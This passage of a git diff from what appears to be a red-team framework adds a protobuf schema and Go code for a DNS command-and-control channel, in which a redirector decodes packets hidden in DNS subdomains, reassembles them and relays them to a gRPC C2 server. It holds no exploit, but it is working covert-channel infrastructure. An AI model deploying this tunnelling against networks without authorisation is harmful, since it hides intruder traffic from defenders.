"\x11PACKET_TYPE_FETCH\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + +var ( + file_dns_proto_rawDescOnce sync.Once + file_dns_proto_rawDescData []byte +) + +func file_dns_proto_rawDescGZIP() []byte { + file_dns_proto_rawDescOnce.Do(func() { + file_dns_proto_rawDescData = 
protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc))) + }) + return file_dns_proto_rawDescData +} + +var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 4) +var file_dns_proto_goTypes = []any{ + (PacketType)(0), // 0: dns.PacketType + (*DNSPacket)(nil), // 1: dns.DNSPacket + (*InitPayload)(nil), // 2: dns.InitPayload + (*FetchPayload)(nil), // 3: dns.FetchPayload + (*ResponseMetadata)(nil), // 4: dns.ResponseMetadata +} +var file_dns_proto_depIdxs = []int32{ + 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType + 1, // [1:1] is the sub-list for method output_type + 1, // [1:1] is the sub-list for method input_type + 1, // [1:1] is the sub-list for extension type_name + 1, // [1:1] is the sub-list for extension extendee + 0, // [0:1] is the sub-list for field type_name +} + +func init() { file_dns_proto_init() } +func file_dns_proto_init() { + if File_dns_proto != nil { + return + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), + NumEnums: 1, + NumMessages: 4, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_dns_proto_goTypes, + DependencyIndexes: file_dns_proto_depIdxs, + EnumInfos: file_dns_proto_enumTypes, + MessageInfos: file_dns_proto_msgTypes, + }.Build() + File_dns_proto = out.File + file_dns_proto_goTypes = nil + file_dns_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index d8238b97c..31f03d2b5 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -2,3 +2,4 @@ package c2 //go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto //go:generate protoc -I=./proto 
--go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./dnspb --go_opt=paths=source_relative dns.proto diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto new file mode 100644 index 000000000..1c9d4d2d9 --- /dev/null +++ b/tavern/internal/c2/proto/dns.proto @@ -0,0 +1,45 @@ +syntax = "proto3"; + +package dns; + +option go_package = "realm.pub/tavern/internal/c2/dnspb"; + +// PacketType defines the type of DNS packet in the conversation +enum PacketType { + PACKET_TYPE_UNSPECIFIED = 0; + PACKET_TYPE_INIT = 1; // Establish conversation + PACKET_TYPE_DATA = 2; // Send data chunk + PACKET_TYPE_END = 3; // Finalize request + PACKET_TYPE_FETCH = 4; // Retrieve response chunk +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +message DNSPacket { + PacketType type = 1; // Packet type + uint32 sequence = 2; // Chunk sequence number (0-based) + string conversation_id = 3; // 12-character random conversation ID + bytes data = 4; // Chunk payload (or InitPayload for INIT packets) + uint32 crc32 = 5; // Optional CRC32 for validation +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +message InitPayload { + string method_code = 1; // 2-character gRPC method code (e.g., "ct", "fa") + uint32 total_chunks = 2; // Total number of data chunks to expect + uint32 data_crc32 = 3; // CRC32 checksum of complete request data +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +message FetchPayload { + uint32 chunk_index = 1; // Which chunk to fetch (0-based) +} + +// ResponseMetadata indicates the response is chunked and must be fetched +message ResponseMetadata { + uint32 total_chunks = 1; // Total number of response chunks + 
uint32 data_crc32 = 2; // CRC32 checksum of complete response data + uint32 chunk_size = 3; // Size of each chunk (last may be smaller) +} diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 8e1a04861..ecd60ac07 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -5,8 +5,8 @@ import ( "encoding/base32" "encoding/binary" "fmt" + "hash/crc32" "log/slog" - "math/rand" "net" "net/url" "strings" @@ -14,129 +14,56 @@ import ( "time" "google.golang.org/grpc" - "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" - "google.golang.org/grpc/status" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" "realm.pub/tavern/internal/redirectors" ) const ( - // DNS protocol limits - dnsHeaderSize = 12 // Standard DNS header size - maxLabelLength = 63 // Maximum bytes in a DNS label - txtRecordType = 16 // TXT record QTYPE - aRecordType = 1 // A record QTYPE - aaaaRecordType = 28 // AAAA record QTYPE - dnsClassIN = 1 // Internet class + convTimeout = 15 * time.Minute defaultUDPPort = "53" - convTimeout = 15 * time.Minute // Conversation expiration - - // Protocol field sizes (base36 encoding) - typeSize = 1 // Packet type: i/d/e/f - seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks - convIDSize = 12 // Conversation ID length - headerSize = typeSize + seqSize + convIDSize - - // Packet types - typeInit = 'i' // Init: establish conversation - typeData = 'd' // Data: send chunk - typeEnd = 'e' // End: finalize and process - typeFetch = 'f' // Fetch: retrieve response chunk - - // Response prefixes (TXT records) - respOK = "ok:" // Success with data - respMissing = "m:" // Missing chunks list - respError = "e:" // Error message - respChunked = "r:" // Response chunked metadata - - // Response size limits (to fit in single UDP packet) - maxDNSResponseSize = 1400 // Conservative MTU limit - maxResponseChunkSize = 1200 // Base32-encoded chunk size - - // DNS 
response constants - dnsResponseFlags = 0x8180 // Flags: Response, no error (0x81, 0x80) - dnsErrorFlags = 0x8183 // Flags: Response with name error (0x81, 0x83) - dnsPointerToQuestion = 0xC00C // Compression pointer to question at offset 12 - dnsTTLSeconds = 60 // DNS record TTL in seconds - txtMaxChunkSize = 255 // Maximum size of single TXT string - - // Localhost IP addresses (for benign responses) - localhostIPv4Octet1 = 127 - localhostIPv4Octet4 = 1 - localhostIPv6Byte15 = 1 // ::1 has only byte 15 set to 1, rest are 0 - - // Base36 encoding constants - base36Radix = 36 - base36Pow2 = 1296 // 36^2 - base36Pow3 = 46656 // 36^3 - base36Pow4 = 1679616 // 36^4 - - // CRC16-CCITT constants - crc16Init = 0xFFFF - crc16Polynomial = 0x1021 - crc16HighBit = 0x8000 + + // DNS protocol constants + dnsHeaderSize = 12 + maxLabelLength = 63 + txtRecordType = 16 + aRecordType = 1 + aaaaRecordType = 28 + dnsClassIN = 1 + dnsTTLSeconds = 60 + + // DNS response flags + dnsResponseFlags = 0x8180 + dnsErrorFlags = 0x8183 + dnsPointer = 0xC00C + + txtMaxChunkSize = 255 ) func init() { redirectors.Register("dns", &Redirector{}) } -func min(a, b int) int { - if a < b { - return a - } - return b -} - // Redirector handles DNS-based C2 communication type Redirector struct { - conversations sync.Map // conv_id -> *Conversation - baseDomains []string // Accepted base domains for queries -} - -// GetConversation retrieves a conversation by ID (for testing) -func (r *Redirector) GetConversation(convID string) (*Conversation, bool) { - val, ok := r.conversations.Load(convID) - if !ok { - return nil, false - } - return val.(*Conversation), true -} - -// StoreConversation stores a conversation (for testing) -func (r *Redirector) StoreConversation(convID string, conv *Conversation) { - r.conversations.Store(convID, conv) -} - -// CleanupConversationsOnce runs cleanup logic once (for testing) -func (r *Redirector) CleanupConversationsOnce(timeout time.Duration) { - now := time.Now() - 
r.conversations.Range(func(key, value interface{}) bool { - conv := value.(*Conversation) - conv.mu.Lock() - if now.Sub(conv.LastActivity) > timeout { - r.conversations.Delete(key) - } - conv.mu.Unlock() - return true - }) + conversations sync.Map + baseDomains []string } // Conversation tracks state for a request-response exchange type Conversation struct { - mu sync.Mutex - ID string // Exported for testing - MethodPath string // gRPC method path (exported for testing) - TotalChunks int // Expected number of request chunks (exported for testing) - ExpectedCRC uint16 // CRC16 of complete request data (exported for testing) - Chunks map[int][]byte // Received request chunks (exported for testing) - LastActivity time.Time // Exported for testing - - // Response chunking (for large responses) - ResponseData []byte // Exported for testing - ResponseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) (exported for testing) - ResponseCRC uint16 // Exported for testing - IsBinaryChunking bool // true for A/AAAA, false for TXT (exported for testing) + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + MaxResponseSize int // Max size per DNS response packet } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { @@ -179,7 +106,7 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr if netErr, ok := err.(net.Error); ok && netErr.Timeout() { continue } - slog.Error("failed to read UDP packet", "error", err) + slog.Error("failed to read UDP", "error", err) continue } @@ -189,7 +116,6 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } // ParseListenAddr extracts address and domain parameters from listenOn string -// Format: 
"addr:port?domain=example.com&domain=other.com" func ParseListenAddr(listenOn string) (string, []string, error) { parts := strings.SplitN(listenOn, "?", 2) addr := parts[0] @@ -217,7 +143,7 @@ func ParseListenAddr(listenOn string) (string, []string, error) { if key == "domain" && value != "" { decoded, err := url.QueryUnescape(value) if err != nil { - return "", nil, fmt.Errorf("failed to decode domain value: %w", err) + return "", nil, fmt.Errorf("failed to decode domain: %w", err) } domains = append(domains, decoded) } @@ -241,7 +167,6 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { conv.mu.Lock() if now.Sub(conv.LastActivity) > convTimeout { r.conversations.Delete(key) - slog.Debug("conversation expired", "conv_id", conv.ID) } conv.mu.Unlock() return true @@ -264,478 +189,328 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr return } - // Normalize domain to lowercase for case-insensitive matching domain = strings.ToLower(domain) - slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) - domainParts := strings.Split(domain, ".") - var subdomainParts []string - var matchedBaseDomain string - - for _, baseDomain := range r.baseDomains { - baseDomainParts := strings.Split(baseDomain, ".") - - if len(domainParts) <= len(baseDomainParts) { - continue - } - - domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] - matched := true - for i, part := range baseDomainParts { - if !strings.EqualFold(part, domainSuffix[i]) { - matched = false - break - } - } - - if matched { - subdomainParts = domainParts[:len(domainParts)-len(baseDomainParts)] - matchedBaseDomain = baseDomain - break - } - } - - if matchedBaseDomain == "" { - slog.Debug("domain doesn't match any configured base domains", "domain", domain, "base_domains", r.baseDomains) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - if len(subdomainParts) < 1 { - slog.Debug("no subdomain found", 
"domain", domain, "matched_base_domain", matchedBaseDomain) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - // Reassemble all subdomain labels (they form a base32-encoded packet) - fullSubdomain := strings.Join(subdomainParts, "") - - // Decode base32 to get raw packet bytes - packetBytes, err := decodeBase32(fullSubdomain) + // Extract subdomain + subdomain, err := r.extractSubdomain(domain) if err != nil { - // For A/AAAA queries, this is likely a DNS resolver doing lookups (not C2 traffic) - // Return a benign response instead of an error to avoid polluting logs - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring non-C2 resolver query", "query_type", queryType, "domain", domain) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - // Parse packet: [type:1][seq:5][convid:12][data...] 
- if len(packetBytes) < headerSize { - // For A/AAAA queries with invalid packet structure, likely resolver lookups - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring malformed resolver query", "query_type", queryType, "domain", domain, "size", len(packetBytes)) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) + slog.Debug("domain doesn't match base domains", "domain", domain) r.sendErrorResponse(conn, addr, transactionID) return } - pktType := rune(packetBytes[0]) - seqStr := string(packetBytes[typeSize : typeSize+seqSize]) - convID := string(packetBytes[typeSize+seqSize : headerSize]) - data := packetBytes[headerSize:] // Keep as []byte, don't convert to string - - slog.Debug("parsed packet", "type", string(pktType), "seq_str", seqStr, "conv_id", convID, "data_len", len(data), "total_packet_len", len(packetBytes)) - - seq, err := decodeSeq(seqStr) + // Decode packet + packet, err := r.decodePacket(subdomain) if err != nil { - // For A/AAAA queries, invalid sequence likely means resolver lookup - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring resolver query with invalid sequence", "query_type", queryType, "domain", domain) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("invalid sequence", "seq", seqStr, "error", err) + slog.Debug("failed to decode packet", "error", err) r.sendErrorResponse(conn, addr, transactionID) return } + slog.Debug("parsed packet", "type", packet.Type, "seq", packet.Sequence, "conv_id", packet.ConversationId) + + // Handle packet based on type var responseData []byte - switch pktType { - case typeInit: - responseData, err = r.HandleInitPacket(convID, string(data)) - case typeData: - responseData, err = r.HandleDataPacket(convID, seq, data) - case typeEnd: - responseData, err = 
r.HandleEndPacket(ctx, upstream, convID, seq, queryType) - case typeFetch: - responseData, err = r.HandleFetchPacket(convID, seq) + switch packet.Type { + case dnspb.PacketType_PACKET_TYPE_INIT: + responseData, err = r.handleInitPacket(packet) + case dnspb.PacketType_PACKET_TYPE_DATA: + responseData, err = r.handleDataPacket(packet) + case dnspb.PacketType_PACKET_TYPE_END: + responseData, err = r.handleEndPacket(ctx, upstream, packet, queryType) + case dnspb.PacketType_PACKET_TYPE_FETCH: + responseData, err = r.handleFetchPacket(packet) default: - err = fmt.Errorf("unknown packet type: %c", pktType) + err = fmt.Errorf("unknown packet type: %d", packet.Type) } if err != nil { - slog.Error("failed to handle packet", "type", string(pktType), "error", err) - errorResp := fmt.Sprintf("%s%s", respError, err.Error()) - r.sendDNSResponse(conn, addr, transactionID, domain, []byte(errorResp), queryType) + slog.Error("failed to handle packet", "type", packet.Type, "error", err) + r.sendErrorResponse(conn, addr, transactionID) return } - var maxCapacity int - switch queryType { - case txtRecordType: - maxCapacity = maxDNSResponseSize - case aRecordType: - maxCapacity = 4 - case aaaaRecordType: - maxCapacity = 16 - default: - maxCapacity = maxDNSResponseSize - } - - slog.Debug("checking if chunking needed", "query_type", queryType, "response_size", len(responseData), - "max_capacity", maxCapacity, "packet_type", string(pktType)) - - if queryType != txtRecordType && len(responseData) > maxCapacity && (pktType == typeEnd || pktType == typeInit) { - var conv *Conversation - var actualConvID string - - if pktType == typeInit { - actualConvID = convID - conv = &Conversation{ - ID: actualConvID, - LastActivity: time.Now(), - ResponseData: responseData, - ResponseCRC: CalculateCRC16(responseData), - IsBinaryChunking: true, - } - r.conversations.Store(actualConvID, conv) - } else { - convVal, ok := r.conversations.Load(convID) - if !ok { - slog.Error("conversation not found for 
chunking", "conv_id", convID) - r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) - return - } - conv = convVal.(*Conversation) - actualConvID = convID - } + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, responseData) +} - conv.mu.Lock() +func (r *Redirector) extractSubdomain(domain string) (string, error) { + domainParts := strings.Split(domain, ".") - conv.ResponseData = responseData - conv.ResponseCRC = CalculateCRC16(responseData) - conv.IsBinaryChunking = true + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") - conv.ResponseChunks = nil - for i := 0; i < len(responseData); i += maxCapacity { - end := i + maxCapacity - if end > len(responseData) { - end = len(responseData) - } - conv.ResponseChunks = append(conv.ResponseChunks, string(responseData[i:end])) + if len(domainParts) <= len(baseDomainParts) { + continue } - conv.mu.Unlock() - - var response []byte - if maxCapacity <= 4 { - if len(conv.ResponseChunks) > 65535 { - slog.Error("too many chunks for binary format", "chunks", len(conv.ResponseChunks)) - r.sendErrorResponse(conn, addr, transactionID) - return + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break } - response = make([]byte, 4) - response[0] = 0xFF - response[1] = byte(len(conv.ResponseChunks) >> 8) - response[2] = byte(len(conv.ResponseChunks) & 0xFF) - response[3] = byte(conv.ResponseCRC & 0xFF) - - slog.Debug("using compact binary chunked indicator", - "chunks", len(conv.ResponseChunks), "crc_low", response[3]) - } else { - responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) - response = []byte(responseStr) } - slog.Debug("response too large for record type, using multi-query chunking", - "conv_id", actualConvID, "packet_type", 
string(pktType), "data_size", len(responseData), - "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.ResponseChunks), - "indicator_size", len(response)) - - r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) - return + if matched { + subdomainParts := domainParts[:len(domainParts)-len(baseDomainParts)] + return strings.Join(subdomainParts, "."), nil + } } - success := r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) - - if success && pktType == typeEnd && !strings.HasPrefix(string(responseData), respChunked) { - r.conversations.Delete(convID) - slog.Debug("conversation completed and cleaned up", "conv_id", convID) - } + return "", fmt.Errorf("no matching base domain") } -// HandleInitPacket processes init packet and creates conversation -// Init payload format: [method_code:2][total_chunks:5][crc:4] -func (r *Redirector) HandleInitPacket(tempConvID string, data string) ([]byte, error) { - slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) +// decodePacket decodes DNS packet from subdomain +// Subdomain format: . 
+// The entire protobuf packet is base32-encoded and split into 63-char labels +func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { + // Remove all dots to get continuous base32 string + // Labels were split at 63-char boundaries, now rejoin them + encodedData := strings.ReplaceAll(subdomain, ".", "") - // Payload: method(2) + chunks(5) + crc(4) = 11 chars - if len(data) < 11 { - slog.Debug("init payload too short", "expected", 11, "got", len(data)) - return nil, fmt.Errorf("init payload too short: expected 11, got %d", len(data)) + // Decode data using Base32 (case-insensitive, no padding) + packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) + if err != nil { + return nil, fmt.Errorf("failed to decode Base32 data: %w", err) } - methodCode := data[:2] - totalChunksStr := data[2:7] - crcStr := data[7:11] - - slog.Debug("parsing init payload", "method_code", methodCode, "chunks_str", totalChunksStr, "crc_str", crcStr) - - totalChunks, err := decodeSeq(totalChunksStr) - if err != nil { - return nil, fmt.Errorf("invalid total chunks: %w", err) + // Unmarshal protobuf + var packet dnspb.DNSPacket + if err := proto.Unmarshal(packetData, &packet); err != nil { + return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) } - // CRC is base36-encoded (4 chars) - expectedCRC, err := decodeBase36CRC(crcStr) - if err != nil { - return nil, fmt.Errorf("invalid CRC: %w", err) + // Verify CRC for data packets + if packet.Type == dnspb.PacketType_PACKET_TYPE_DATA && len(packet.Data) > 0 { + actualCRC := crc32.ChecksumIEEE(packet.Data) + if actualCRC != packet.Crc32 { + return nil, fmt.Errorf("CRC mismatch: expected %d, got %d", packet.Crc32, actualCRC) + } } - methodPath := codeToMethod(methodCode) - realConvID := generateConvID() + return &packet, nil +} + +// handleInitPacket processes INIT packet +func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + // 
Unmarshal init payload + var initPayload dnspb.InitPayload + if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) + } + // Create conversation conv := &Conversation{ - ID: realConvID, - MethodPath: methodPath, - TotalChunks: totalChunks, - ExpectedCRC: uint16(expectedCRC), - Chunks: make(map[int][]byte), + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + Chunks: make(map[uint32][]byte), LastActivity: time.Now(), } - r.conversations.Store(realConvID, conv) + r.conversations.Store(packet.ConversationId, conv) - slog.Debug("created conversation", "conv_id", realConvID, "method", methodPath, "total_chunks", totalChunks) + slog.Debug("created conversation", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks) - return []byte(realConvID), nil + return []byte("ok"), nil } -// HandleDataPacket stores a data chunk in the conversation -func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleDataPacket processes DATA packet +func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() + // Store chunk (sequence is 1-indexed) + conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() - // Ignore chunks beyond declared total (duplicates/retransmissions) - if seq >= conv.TotalChunks { - slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.TotalChunks) - return []byte{}, nil - } - - 
conv.Chunks[seq] = data - - dataPreview := "" - if len(data) > 0 { - previewLen := min(len(data), 16) - dataPreview = fmt.Sprintf("%x", data[:previewLen]) - } - - slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) + slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - // Return acknowledgment - return []byte{}, nil + return []byte("ok"), nil } -// HandleEndPacket processes end packet and returns server response -func (r *Redirector) HandleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleEndPacket processes END packet and forwards to upstream +func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() - conv.LastActivity = time.Now() - - slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.Chunks)) - - // Check for missing chunks - var missing []int - for i := 0; i < conv.TotalChunks; i++ { - if _, ok := conv.Chunks[i]; !ok { - missing = append(missing, i) - } + // Check if all chunks received + if uint32(len(conv.Chunks)) != conv.TotalChunks { + return nil, fmt.Errorf("missing chunks: received %d, expected %d", len(conv.Chunks), conv.TotalChunks) } - if len(missing) > 0 { - // Return missing chunks list - missingStrs := make([]string, len(missing)) - for i, seq := range missing { - missingStrs[i] 
= encodeSeq(seq) + // Reassemble data (chunks are 1-indexed) + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + if !ok { + return nil, fmt.Errorf("missing chunk %d", i) } - response := fmt.Sprintf("%s%s", respMissing, strings.Join(missingStrs, ",")) - - slog.Debug("returning missing chunks", "conv_id", convID, "count", len(missing), "missing_seqs", missing) - - return []byte(response), nil + fullData = append(fullData, chunk...) } - // Reassemble data (chunks now contain raw binary, not base32) - requestData := r.reassembleChunks(conv.Chunks, conv.TotalChunks) - - // Sanity check: ensure we have exactly the right number of chunks - if len(conv.Chunks) != conv.TotalChunks { - slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) - return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.Chunks), conv.TotalChunks)), nil + // Verify CRC + actualCRC := crc32.ChecksumIEEE(fullData) + if actualCRC != conv.ExpectedCRC { + return nil, fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) } - slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) - - // Verify CRC (chunks already contain raw decrypted data) - actualCRC := CalculateCRC16(requestData) - expectedCRC := uint16(conv.ExpectedCRC) - - slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.Chunks), "chunks_expected", conv.TotalChunks) - - if actualCRC != expectedCRC { - errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) - slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) - return []byte(respError + "invalid_crc"), nil - } - slog.Debug("reassembled and validated data", "conv_id", 
convID, "bytes", len(requestData)) + slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) // Forward to upstream gRPC server - responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, requestData) + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { return nil, fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine if we need to base32-encode the response - // For A/AAAA records that will use binary chunking, return raw binary - // For TXT records, return base32-encoded with "ok:" prefix - useBinaryChunking := (queryType == aRecordType || queryType == aaaaRecordType) - - if useBinaryChunking { - // Return raw binary data for A/AAAA records - // The main handler will chunk this if needed - return responseData, nil + // Determine max response size based on record type to fit in UDP packet + // For A/AAAA records with multiple records, we need much smaller chunks + // to avoid creating packets with 100+ DNS records + var maxSize int + switch queryType { + case txtRecordType: + maxSize = 400 // TXT can handle larger chunks in single record + case aRecordType: + maxSize = 64 // A records: 64 bytes = 16 A records (16 * 4 bytes) + case aaaaRecordType: + maxSize = 128 // AAAA records: 128 bytes = 8 AAAA records (8 * 16 bytes) + default: + maxSize = 400 } - // For TXT records, use base32 encoding - encodedResponse := encodeBase32(responseData) - responseWithPrefix := respOK + encodedResponse - - if len(responseWithPrefix) > maxDNSResponseSize { - // Response too large - chunk it - slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) - - // Store response data in conversation + // Check if response needs chunking + if len(responseData) > maxSize { + // Calculate CRC for full response + conv.ResponseCRC = crc32.ChecksumIEEE(responseData) conv.ResponseData = responseData - 
conv.ResponseCRC = CalculateCRC16(responseData) // Use full 16-bit CRC - // Chunk the encoded response + // Split into chunks conv.ResponseChunks = nil - for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { - end := i + maxResponseChunkSize - if end > len(encodedResponse) { - end = len(encodedResponse) + for i := 0; i < len(responseData); i += maxSize { + end := i + maxSize + if end > len(responseData) { + end = len(responseData) } - conv.ResponseChunks = append(conv.ResponseChunks, encodedResponse[i:end]) + conv.ResponseChunks = append(conv.ResponseChunks, responseData[i:end]) } - // Return chunked response indicator: "r:[num_chunks]:[crc]" - response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) - slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.ResponseChunks), "crc", conv.ResponseCRC) - return []byte(response), nil + conv.LastActivity = time.Now() + + slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), + "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + + // Return metadata about chunked response + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: uint32(maxSize), + } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + return metadataBytes, nil } - return []byte(responseWithPrefix), nil + // Response fits in single packet + conv.ResponseData = responseData + conv.LastActivity = time.Now() + + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + + return []byte("ok"), nil } -// HandleFetchPacket serves a response chunk to the client -func (r *Redirector) HandleFetchPacket(convID string, chunkSeq int) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleFetchPacket processes FETCH packet 
+func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() + if conv.ResponseData == nil { + return nil, fmt.Errorf("no response data available") + } + conv.LastActivity = time.Now() - // Check if this is the final fetch (cleanup request) - if chunkSeq >= len(conv.ResponseChunks) { - // Client is done fetching - clean up conversation - r.conversations.Delete(convID) - slog.Debug("conversation completed and cleaned up", "conv_id", convID) - return []byte(respOK), nil - } + // Check if response was chunked + if len(conv.ResponseChunks) > 0 { + // Parse fetch payload to get chunk index + var fetchPayload dnspb.FetchPayload + if len(packet.Data) > 0 { + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + } + } - // Return the requested chunk - if chunkSeq < 